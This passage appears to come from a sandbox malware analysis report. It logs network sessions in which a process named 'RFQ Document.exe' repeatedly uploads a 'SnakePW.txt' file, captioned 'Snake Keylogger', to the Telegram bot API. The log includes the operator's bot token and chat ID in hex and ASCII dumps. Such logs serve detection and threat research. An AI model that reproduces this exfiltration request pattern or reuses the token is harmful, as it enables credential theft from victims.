2021-09-28 05:58:45 UTC	179	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 36 34 39 34 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d06494a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:53 UTC	180	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:53 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:53 UTC	180	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.4	49910	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:53 UTC	180	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d53ebc56 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:53 UTC	180	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 35 33 65 62 63 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d53ebc56Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:56 UTC	181	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:56 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:56 UTC	181	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12697,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.4	49913	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:56 UTC	182	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d719308d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:56 UTC	182	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 31 39 33 30 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d719308dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:56 UTC	182	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:56 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:56 UTC	183	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12699,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.4	49914	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:56 UTC	183	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d735cde8 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:56 UTC	184	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 33 35 63 64 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d735cde8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:56 UTC	184	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:56 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:56 UTC	184	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12700,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.4	49915	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:56 UTC	185	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d754caca Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:56 UTC	185	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 35 34 63 61 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d754cacaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:56 UTC	186	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:56 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:56 UTC	186	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12701,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.4	49916	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:56 UTC	186	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d76ca2a1 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:56 UTC	187	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 36 63 61 32 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d76ca2a1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:56 UTC	187	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:56 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:56 UTC	188	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12702,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.4	49917	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:57 UTC	188	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d7821822 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:57 UTC	188	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 38 32 31 38 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d7821822Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:57 UTC	189	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:57 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:57 UTC	189	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12703,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.4	49918	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:57 UTC	190	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d7a83f75 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:57 UTC	190	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 61 38 33 66 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d7a83f75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:57 UTC	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:57 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
